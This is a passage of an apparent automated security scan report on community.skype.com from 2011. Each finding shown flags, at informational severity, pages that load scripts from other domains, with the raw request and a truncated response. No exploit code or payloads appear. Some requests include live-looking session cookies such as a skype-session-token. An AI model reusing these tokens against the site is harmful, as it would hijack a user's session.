<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Re: noptrix.
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/5766E95FAAD5ECDCE975721AE13E6F34/lia-scripts-body-min.js"></script>
...[SNIP]...

18.262. http://community.skype.com/t5/forums/recentpostspage/category-id/English/post-type/message  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/forums/recentpostspage/category-id/English/post-type/message

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/forums/recentpostspage/category-id/English/post-type/message HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:45:36 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 117596

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> All Posts -
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FEB53D0F543EDE4B5C8AC83434F1F2F8/lia-scripts-body-min.js"></script>
...[SNIP]...

18.263. http://community.skype.com/t5/forums/searchpage.enableautocomplete:enableautocomplete  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/forums/searchpage.enableautocomplete:enableautocomplete

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/forums/searchpage.enableautocomplete:enableautocomplete HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Date: Sun, 04 Sep 2011 21:45:43 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 35996

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> An Unexpecte
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/016526226213F82F99CCE0C6DD68FCB3/lia-scripts-body-min.js"></script>
...[SNIP]...

18.264. http://community.skype.com/t5/forums/searchpage.searchauthorfilter.form.form  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/forums/searchpage.searchauthorfilter.form.form

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/forums/searchpage.searchauthorfilter.form.form HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Date: Sun, 04 Sep 2011 21:45:46 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 35945

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> An Unexpecte
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/016526226213F82F99CCE0C6DD68FCB3/lia-scripts-body-min.js"></script>
...[SNIP]...

18.265. http://community.skype.com/t5/forums/searchpage.searchcontent.messagesearchcontent.searchform.form.form  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/forums/searchpage.searchcontent.messagesearchcontent.searchform.form.form

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/forums/searchpage.searchcontent.messagesearchcontent.searchform.form.form HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Date: Sun, 04 Sep 2011 21:45:45 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 36248

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> An Unexpecte
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/016526226213F82F99CCE0C6DD68FCB3/lia-scripts-body-min.js"></script>
...[SNIP]...

18.266. http://community.skype.com/t5/forums/searchpage/tab/message  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/forums/searchpage/tab/message

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/forums/searchpage/tab/message?filter=location&location=Category%3AEnglish&q=xss HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://community.skype.com/t5/English/ct-p/English?profile.language=en
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: community.skype.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824; SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170534:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.115/0; VISITORID=1344388383; LiSESSIONID=3607C6434AF107556B11C2CE05ECE91B

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:09:56 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Content-Length: 128577
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Search - Sky
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/A07927DB54138E290B0015853D34D7F4/lia-scripts-body-min.js"></script>
...[SNIP]...

18.267. http://community.skype.com/t5/forums/searchpage/tab/message  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/forums/searchpage/tab/message

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/forums/searchpage/tab/message HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:45:32 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 118968

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Search - Sky
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/3F315F3D50A0B5E3C4DDBB90534A3317/lia-scripts-body-min.js"></script>
...[SNIP]...

18.268. http://community.skype.com/t5/forums/searchpage/tab/user  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/forums/searchpage/tab/user

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/forums/searchpage/tab/user HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:45:34 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 64364

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Users - Skyp
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/92E3510B49C664BFFFB1D19015A96778/lia-scripts-body-min.js"></script>
...[SNIP]...

18.269. http://community.skype.com/t5/forums/tagdetailpage/tag-cloud-grouping/tag/tag-cloud-style/frequent/message-scope/core-node/category-id/English/user-scope/all/tag-scope/all/timerange/all/tag-visibility-scope/public  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/forums/tagdetailpage/tag-cloud-grouping/tag/tag-cloud-style/frequent/message-scope/core-node/category-id/English/user-scope/all/tag-scope/all/timerange/all/tag-visibility-scope/public

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/forums/tagdetailpage/tag-cloud-grouping/tag/tag-cloud-style/frequent/message-scope/core-node/category-id/English/user-scope/all/tag-scope/all/timerange/all/tag-visibility-scope/public HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:45:42 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 84032

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Top Tags - S
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/40C79E4FDA2A3C9A382F58CB1C698B69/lia-scripts-body-min.js"></script>
...[SNIP]...

18.270. http://community.skype.com/t5/forums/usersonlinepage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/forums/usersonlinepage

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/forums/usersonlinepage HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:45:37 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 64805

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Users Online
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FEB53D0F543EDE4B5C8AC83434F1F2F8/lia-scripts-body-min.js"></script>
...[SNIP]...

18.271. http://community.skype.com/t5/help/faqpage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/help/faqpage

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/help/faqpage HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://community.skype.com/t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/m-p/24028/highlight/true
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: community.skype.com
Proxy-Connection: Keep-Alive
Cookie: skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824; SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170534:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.115/0; VISITORID=1344388383; LiSESSIONID=3607C6434AF107556B11C2CE05ECE91B

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:10:16 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Content-Length: 44552
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Help - Skype
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/6141DE8643E58E1BA36A2E83A753DBF6/lia-scripts-body-min.js"></script>
...[SNIP]...

18.272. http://community.skype.com/t5/help/faqpage/faq-category-id/advanced  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/help/faqpage/faq-category-id/advanced

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/help/faqpage/faq-category-id/advanced HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:24 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 44085

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Help - Skype
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/6141DE8643E58E1BA36A2E83A753DBF6/lia-scripts-body-min.js"></script>
...[SNIP]...

18.273. http://community.skype.com/t5/help/faqpage/faq-category-id/blogs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/help/faqpage/faq-category-id/blogs

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /t5/help/faqpage/faq-category-id/blogs HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:24 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 41840

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Help - Skype
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...

18.274. http://community.skype.com/t5/help/faqpage/faq-category-id/catex  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/help/faqpage/faq-category-id/catex

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/help/faqpage/faq-category-id/catex HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:24 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 45208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Help - Skype
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/6141DE8643E58E1BA36A2E83A753DBF6/lia-scripts-body-min.js"></script>
...[SNIP]...

18.275. http://community.skype.com/t5/help/faqpage/faq-category-id/ideas  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/help/faqpage/faq-category-id/ideas

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/help/faqpage/faq-category-id/ideas HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:25 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 47914

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Help - Skype
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/6141DE8643E58E1BA36A2E83A753DBF6/lia-scripts-body-min.js"></script>
...[SNIP]...

18.276. http://community.skype.com/t5/help/faqpage/faq-category-id/images  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/help/faqpage/faq-category-id/images

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/help/faqpage/faq-category-id/images HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://community.skype.com/t5/help/faqpage/faq-category-id/posting
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: community.skype.com
Proxy-Connection: Keep-Alive
Cookie: skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824; SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170534:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.115/0; VISITORID=1344388383; LiSESSIONID=3607C6434AF107556B11C2CE05ECE91B

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:10:23 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Content-Length: 48221
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Help - Skype
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/6141DE8643E58E1BA36A2E83A753DBF6/lia-scripts-body-min.js"></script>
...[SNIP]...

18.277. http://community.skype.com/t5/help/faqpage/faq-category-id/images2  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/help/faqpage/faq-category-id/images2

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/help/faqpage/faq-category-id/images2 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:25 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 54162

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Help - Skype
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

